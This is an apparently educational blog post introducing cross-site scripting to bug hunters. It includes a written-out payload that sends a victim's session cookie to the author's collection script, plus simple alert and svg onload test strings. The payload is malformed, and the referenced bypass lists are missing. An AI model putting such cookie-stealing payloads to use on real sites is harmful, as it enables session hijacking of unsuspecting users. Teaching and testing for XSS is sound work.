Before we start let’s understand what actually XSS is ?
What the hack is XSS (Cross-Site-Scripting)?
XSS is a Client Side Code Injection attack. With that I mean, by embedding malicious code in a genuine web page, the attacker hopes to execute harmful scripts on the victim’s web browser.
I found this image to be helpful to understand the concept clearly. Have a look and try to understand what is actually happening?
Still have any doubt? No worries, at all let’s take a more deep dive with an example.
Example
1. Let’s say you are testing a site xyz.com and you found that, you can inject your script at any parameter/Vulnerable point.
2. Then you injected your script let’s say “<a onlcick document.location=”http://localhost/ethicalkaps/getcookies.php?cookie=’+escape(document.cookie); href=”https://ethicalkaps.com”>ClickHere</a>”. (This will basically steal the cookie from victim’s session )
3. That script went to web application and it manipulated the website code.
4. Now, when victim visits your link that you have created through href, then you will be able to fetch victim’s session cookie.
Simple Right? Yeah, indeed it is !! But what happens most of the time, the developer sanitizes the user input and because of that we are unable to inject our payload directly onto the website so we look for other ways to bypass the sanitization.
Few ways to bypass the restrictions :-
I personally prefer :-
Reason being they keep updating their payload list on the regular basis.
These are some ways that you can’t forget to look out for. If you want to check more about how you can actually bypass the coding restrictions.
Visit :-
for some practical payload stuffs.
So Hackers, Now its time for you to decide whether Is it really just about finding out the “PARAMETERS” or “SEARCH” field and running these type of payloads? For e.g. “><script>alert(“Cyberpunks here”)</script> , “><svg/onload=alert(1)> etc. OR there is something more to it ?
Keep Digging and learning new stuffs. I will come back to you with another #BehindtheScene of some other vulnerability. Till then take care and Keep Hunting for good.
Found this post useful? Kindly tap the 👏 button below! :)
If you like the content then, you can support me over here :- @buymeacoffee.com/ethicalkaps
See you in the next Article. Until then Take care. Peace!
You can Follow me on Twitter, on Spotify to listen my writeups and on Instagram.